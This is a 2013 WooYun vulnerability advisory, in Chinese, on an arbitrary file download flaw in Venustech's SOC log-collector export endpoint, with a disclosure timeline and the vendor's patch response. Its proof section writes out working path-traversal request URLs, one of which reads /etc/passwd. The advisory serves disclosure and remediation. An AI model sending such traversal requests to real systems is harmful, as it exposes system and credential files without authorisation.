当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024296

漏洞标题:启明星辰SOC任意文件下载漏洞

相关厂商:北京启明星辰信息安全技术有限公司

漏洞作者: piaox

提交时间:2013-05-23 01:07

修复时间:2013-08-21 01:07

公开时间:2013-08-21 01:07

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-23: 细节已通知厂商并且等待厂商处理中
2013-05-23: 厂商已经确认,细节仅向厂商公开
2013-05-26: 细节向第三方安全合作伙伴开放
2013-07-17: 细节向核心白帽子及相关领域专家公开
2013-07-27: 细节向普通白帽子公开
2013-08-06: 细节向实习白帽子公开
2013-08-21: 细节向公众公开

简要描述:

启明星辰soc在导出交换机syslog配置模板时过滤不严,导致任意文件下载

详细说明:

(1)、下载huawei.switch.xml
http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Huawei.Switch.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/2network
(2)、下载dell.force10.switch.xml
http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Dell.Force10.Switch.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/2network
其中

eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==

这段为固定base64,没什么影响。
(3)、报错暴露出真实物理路径
http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Netflow.v5.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=../
SOC抛错处理不当:

x1.jpg


x2.jpg

得出物理路径

漏洞证明:

http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=passwd&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/../../../../../../../etc

x3.jpg


x4.jpg


x5.jpg

修复方案:

你们是专家

版权声明:转载请注明来源 piaox@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-05-23 11:24

厂商回复:

感谢!我们正在处理。

最新状态:

2013-06-09:5月24日:针对该漏洞,内部发布了《应急响应方案》,为客户提供应急处置。5月29日:针对该漏洞的第一批补丁包发布。6月5日:经过修复,针对该安全漏洞的所有补丁包已经在6月5日正式发布。最终客户可以联系与之接口的启明星辰公司商务和技术人员获取相关补丁包。